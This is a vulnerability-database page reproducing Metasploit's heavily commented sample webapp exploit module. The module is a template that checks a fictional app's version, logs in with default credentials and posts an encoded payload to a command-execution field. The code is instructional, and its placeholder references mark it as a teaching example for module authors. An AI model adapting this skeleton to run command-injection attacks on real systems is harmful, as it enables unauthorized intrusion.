Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Metasploit Sample Webapp Exploit

🗓️ 17 Dec 2019 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 134 Views

This module exploits a vulnerability in a web application

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Metasploit Example Exploit
16 Jul 201700:00
zdt
0day.today		Metasploit Sample Linux Privilege Escalation Exploit
17 Dec 201900:00
zdt
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary web server
#
###
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This exploit affects a webapp, so we need to import HTTP Client
  # to easily interact with it.
  #
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name'           => 'Sample Webapp Exploit',
        'Description'    => %q(
            This exploit module illustrates how a vulnerability could be exploited
          in a webapp.
        ),
        'License'        => MSF_LICENSE,
        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author'         =>
          [
            'h00die <[email protected]>', # msf module
            'researcher' # original PoC, analysis
          ],
        'References'     =>
          [
            [ 'OSVDB', '12345' ],
            [ 'EDB', '12345' ],
            [ 'URL', 'http://www.example.com'],
            [ 'CVE', '1978-1234']
          ],
        # platform refers to the type of platform.  For webapps, this is typically the language of the webapp.
        # js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Platform'       => ['python'],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        'Privileged'     => false,
        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but for webapps typically
        # this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch'           => ARCH_PYTHON,
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DisclosureDate' => "Apr 1 2013",
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget'  => 0
      )
    )
    # set the default port, and a URI that a user can set if the app isn't installed to the root
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
      ], self.class
    )
  end

  #
  # The sample exploit checks the index page to verify the version number is exploitable
  # we use a regex for the version number
  #
  def check
    # we want to handle cases where the port/target isn't open/listening gracefully
    begin
      # only catch the response if we're going to use it, in this case we do for the version
      # detection.
      res = send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'index.php'),
        'method'    => 'GET'
      )
      # gracefully handle if res comes back as nil, since we're not guaranteed a response
      # also handle if we get an unexpected HTTP response code
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200

      # here we're looking through html for the version string, similar to:
      # Version 1.2
      /Version: (?<version>[\d]{1,2}\.[\d]{1,2})<\/td>/ =~ res.body

      if version && Gem::Version.new(version) <= Gem::Version.new('1.3')
        vprint_good("Version Detected: #{version}")
        Exploit::CheckCode::Appears
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
    Exploit::CheckCode::Safe
  end

  #
  # The exploit method attempts a login, then attempts to throw a command execution
  # at a web page through a POST variable
  #
  def exploit
    begin
      # attempt a login. In this case we show basic auth, and a POST to a fake username/password
      # simply to show how both are done
      vprint_status('Attempting login')
      # since we will check res to see if auth was a success, make sure to capture the return
      res = send_request_cgi(
        'uri'           => '/login.html',
        'method'        => 'POST',
        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
        'vars_post'     => {
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
      )

      # a valid login will give us a 301 redirect to /home.html so check that.
      # ALWAYS assume res could be nil and check it first!!!!!
      if res && res.code != 301
        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
      end

      # grab our valid cookie
      cookie = res.get_cookies
      # we don't care what the response is, so don't bother saving it from send_request_cgi
      vprint_status('Attempting exploit')
      send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'command.html'),
        'method'    => 'POST',
        'cookie'    => cookie,
        'vars_post'  =>
        {
          'cmd_str' => payload.encoded
        }
      )

    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end

  end
end

#  0day.today [2019-12-17]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Dec 2019 00:00Current
7.1High risk
Vulners AI Score7.1
metasploitwebappexploithttpclientvulnerabilityexploitedpythonsecuritymoduleosvdbedburlcvedisclosure dateusernamepasswordtarget uriversion number
134